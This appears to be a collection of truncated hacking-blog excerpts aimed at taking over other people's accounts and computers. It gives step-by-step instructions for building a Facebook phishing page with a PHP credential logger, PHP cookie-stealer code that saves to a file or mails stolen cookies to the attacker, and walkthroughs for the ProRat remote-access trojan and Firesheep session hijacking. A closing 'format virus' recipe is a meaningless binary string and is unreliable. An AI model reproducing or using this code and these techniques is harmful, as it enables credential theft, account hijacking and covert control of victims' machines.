
Facebook Hacking via phishing pages

The ways the easiest and most commonly use way of hacking a Facbook account is Phoshing. Now Learn how to Make a Phishing Page. Do as I tell you step by step. Step1:  Goto Step2 :  Save the file to your desktop  with photos  with name  login.php Step3 :  Open the html file with  notepad . Step4 :  Now search for  form method="POST"  and replace it with  form method="GET" Step5 :  And next is replacing  action =" " with action="lol.php" Step6 : now open a notepad and type following as it is. <?phpheader ('Location:');$handle = fopen("lol.txt", "a");foreach($_POST as $variable => $value) {   fwrite($handle, $variable);   fwrite($handle, "=");   fwrite($handle, $value);   fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclo...

Key Logging with ProRat

ProRat is maded by PRO Group and free to use for everyone.  The Latest version is  ProRat_v1.9_Fix2. Features: Full control over files  Drive formatting Key Logging and Screenshots Stealing passwords Open/close CD tray Hide taskbar, desktop, and start button Writing on-screen Movement of cursor View system information Access webcam Download & run files Infection Method: ProRat creates a server(undetected by antivirus and firewall software).  This server is able to run stealthily in the background. After server is created, it will be send to victim. Once the server is started to run in victim system, it wil bring the control to the Attacker.  The software runs completely (including rootkit) in Windows, and such features include killing security software, removing and disabling system restore points, and displaying a fake error message to mislead the victims.  Screenshot: Editions: ProGroup produced some of their programs to all users...

Windows Password Killer Tool

I have explained how to recover the lost password using Backtrack Password Cracking. Here i am going to introduce a new tool named as Windows Password Killer. It enables you remove windows 7 password to reset the administrator, standard user and guest passwords easily without any data losing or file damage. There is 3 different editions - the Lite, Pro and Ultimate, here we take the Pro edition as an example for the password remove process with USB drive (CD/DVD also supported too). Requirements: 1. Any Accessible Computer. 2.USB Drive or CD/DVD Step 1:  Install Password Killer Download the Windows Windows Password Killer from  Here.   Install the windows Password Killer in your friends or any accssible computer. Step 2: Burn a bootable CD/DVD or an USB drive Insert the USB Drive or CD/DVD. Run the Windows Password Killer. Select the USB drive or CD/DVD. click the Create button. It will ask you to verify whether you select correct disk or not. Click "Ye...

cookie stealer Coding in PHP

Here is the simple Cookie Stealer code: Cookie stored in File: <?php $cookie = $HTTP_GET_VARS["cookie"]; $steal = fopen("cookiefile.txt", "a"); fwrite($steal, $cookie ."\\n"); fclose($steal); ?> $cookie = $HTTP_GET_VARS["cookie"];  steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen("cookiefile.txt", "a");  This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie ."\\n");  This will store the stolen cookie inside the file. fclose($steal);  close the opened file. Another version: Sends cookies to the hacker mail   <?php $cookie = $HTTP_GET_VARS["cookie"]; mail("", "Stolen Cookies", $cookie); ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".  Thir...

How to reset BIOS password

Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways: 1. Clear CMOS This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected.  Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is ...

how to Hack Facebook account using Wi-Fi?

Recently You mozilla add on namely " FireSheep" is used for hack thousands of email accounts . As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly within 24 hours. What is the Special in FireSheep? Using FireSheep add on you can control any account without knowing the username and password . Famous Social Network Facebook is victim of this Firesheep. How? The Firesheep uses HTTP Session Hijacking to gain the username and password. What is HTTP Session Hijacking? Attacker use HTTP session Hijacking to steal the cookies from victim. Cookies are file which contains the password and username . Using this HTTP Session Hijacking method you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account. How to use this Firesheep to steal the cookies?  You will need this requirements: Public wifi access winpcap Firesheep  Download wincap from below : Download Firesheep   S...

format all drive with virus

Today i will show you how to make a virus to format Hard disk.  You can send this file to your friend or enemy to format their Hard disk.  But please don't try this on your own computer or else you will end up formatting your own computer. Copy the below codes into Notepad. 01001011000111110010010101010101010000011111100000  Save the file as Format.exe